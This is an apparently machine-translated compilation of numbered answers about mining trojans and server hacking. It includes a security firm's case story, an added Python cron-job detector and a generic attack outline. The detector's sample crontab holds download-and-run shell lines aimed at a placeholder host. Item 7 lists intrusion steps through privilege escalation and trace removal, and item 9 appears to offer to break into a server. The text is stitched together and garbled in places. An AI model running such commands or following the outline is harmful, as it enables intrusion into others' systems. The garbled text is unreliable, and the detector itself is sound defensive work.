1. - All public cloud manufacturers explicitly require that their cloud servers not be used for mining; otherwise the user will be banned.
   - GPUs are mainly used in mining. At present, GPU servers provided by public cloud manufacturers are more expensive, which is not cost-effective, so it is better to use special chips.

   Of course, some hackers intrude into servers through vulnerabilities, implant mining programs and scripts on them, and carry out mining operations, but this is illegal in itself.
2. A new customer recently consulted Sine Security, saying that his server often lags and the website fails to open, and that the remote connection to the server is extremely slow. Sometimes the ping value reaches 300-500, and he often switches. After listening to the customer's words, one will generally judge that he has been attacked by mixed CC + DDoS traffic. Strangely, there is no traffic attack on the computer room. It is not a traffic attack, but it still causes the server to lag and the website to fail to open. What kind of attack is this? To solve the problem of the client's server lag, we immediately arranged a security engineer to carry out security detection and deployment on his Linux server.
The mining Trojan horse is also designed so that if the mining process is forcibly stopped by the customer, it automatically starts again and continues mining, to achieve uninterrupted mining. Careful inspection shows that it works by setting an hourly scheduled task that remotely downloads the shell mining Trojan horse and then executes it, checking whether the process currently exists and, if not, starting the Trojan horse to mine.

A detailed security inspection was carried out on the client's Linux server. It was found that fortunately, there was no encrypted server data, and the worm was infected with the disease virus. If the data had been encrypted, the loss would have been great. The client was a platform, and the client's data was very important. After finding the mining Trojan horse, the customer needed to know how the server was attacked and how the Trojan horse was uploaded, so that attacks can be prevented in the later stage.
Through the security detection and analysis of our security engineers, we found that the server uses an Apache Tomcat environment, the architecture of the platform is JSP + Oracle database, and Apache Tomcat uses the version of 2016, which leads to the serious remote command execution vulnerability of Apache. Through this vulnerability, the intruder can directly invade the server and get the administrator permission of the server. The Sine Security engineer immediately repaired the Apache vulnerability and cleared the Trojan horse. So far, the problem has been solved, the client server runs stably, and the website opens normally.
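The persistence described above (an hourly scheduled task that downloads a shell script, runs it, and restarts the miner when its process is missing) can be hunted for in crontab contents. This is an added example, not from the original post or from Sine Security; the patterns, the constructed sample entries and the function names are assumptions.

```python
import re

# Constructed sample crontab (placeholder names, documentation-range IP).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
0 * * * * curl -fsSL http://203.0.113.10/placeholder.sh | sh
@hourly pgrep -f placeholder-miner || (wget -q -O /tmp/.p http://203.0.113.10/p && sh /tmp/.p)
*/15 * * * * /opt/app/bin/healthcheck
"""

# Heuristic indicators (assumptions for this example, not a complete signature set).
INDICATORS = {
    "download": re.compile(r"\b(curl|wget)\b"),
    "execute": re.compile(r"\|\s*(ba)?sh\b|\b(ba)?sh\s+\S+"),
    "process-check": re.compile(r"\b(pgrep|pidof)\b|\bps\b.*\|\s*grep\b"),
}

def parse_entry(line):
    """Return (schedule, command) for a user-crontab job line, else None."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                      # @hourly, @reboot, ...
        parts = line.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = line.split(None, 5)                   # five time fields + command
    if len(parts) < 6:                            # e.g. PATH=... or MAILTO=...
        return None
    return " ".join(parts[:5]), parts[5]

def find_suspicious_cron(text):
    """Flag jobs that both fetch remote content and hand it to a shell."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        entry = parse_entry(raw)
        if entry is None:
            continue
        schedule, command = entry
        reasons = [name for name, rx in INDICATORS.items() if rx.search(command)]
        if "download" in reasons and "execute" in reasons:
            hourly = schedule == "@hourly" or (
                not schedule.startswith("@") and schedule.split()[1] == "*")
            findings.append({"line": lineno, "schedule": schedule,
                             "hourly_or_more": hourly, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in find_suspicious_cron(SAMPLE_CRONTAB):
        print(finding)
```

On a live host the same function can be fed the output of `crontab -l` for each user and the files under `/etc/cron.d`, keeping in mind that system crontabs carry an extra user field before the command.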
4. Pass a shell to the server, there are characteristic codes, it is easy to find out
5. Vulnerability or local overflow and other methods will promote the user established by itself to administrator or root authority
6. This is a technology; there is no fixed way to crack a computer. You have to analyze the computer: firewall, password, other protection software, etc.
There is no computer in the world that can't be broken. It just depends on who breaks it.
In the case of not knowing the other computer, you just use the method to set it one by one.
If you are a master, you will use the system vulnerability to do damage.
7. Methods and means of attack
(1) Find the target and obtain information. There's a clear target. Find the machine with vulnerability and attack after finding it. That is to say, one is to have goals first, and the other is to have tools first. Generally speaking, such as "worm event", more belong to the latter. The integration of viruses and hackers to make the attack automatic is a popular trend at present. A lot of problems, the past manual virus, to survive through propagation, delete data. After finding the "back door", hackers use these virus means to attack. Scanning is a common way to find loopholes. Then, which services must be provided and which services do not need to be provided. For example, some function services that users do not need will exist in the system as options during installation, so there may be vulnerabilities in the system. Therefore, the more services you receive, the more problems you may have. Therefore, opacity, frequent changes, irregular upgrade and dynamic password make the system relatively safe in the change. At present, in many cases, users do not understand the loopholes in their own system, some congenital unreasonable defects exist in the system, if someone attacks this weakness, it will become a problem. So, first, you need to understand your own system. Version information is also important. Different versions have different weaknesses and may become targets of attack. The key files of the system are also important, from which the user name and password can be extracted.
(2) The method of getting system sensitive files. Anonymous FTP, TFTP, etc. TFTP is used in many worm, strong attack, weak password and other means.
(3) Get initial access. Such as the use of monitoring means to steal passwords. Anonymous FTP, using the default password or trust relationship (password) between hosts. Use email to tell you that the attachment is an upgrade package, but it may be a virus. Take advantage of technical loopholes.
(4) Get the super user password. Such as sniffer, buffer overflow and other means to obtain privileges. At present, the development of security theory has attracted attention. Software engineering and software security have become a parallel way. The larger the software, the more vulnerabilities. At present, someone in China has found six vulnerabilities in Microsoft. It is said that after this discovery, it was directly published on the Internet, but Microsoft has not found a corresponding solution. So it brings great risks to users.
(5) Remove traces. Use after destroying the system.
(6) The usual technique. TFTP, denial of service (distributed denial of service), sniffer, buffer overflow, SYN synchronization storm (send out a large number of connection requests, but regardless of the connection result, occupy a large number of user resources and crash).
8. Generally, it is through detecting the corresponding vulnerabilities of the server website. If the source code has no relevant vulnerabilities, you can try the server or sidenote intrusion. Generally, it is a matter of time.
9. Send me the server IP address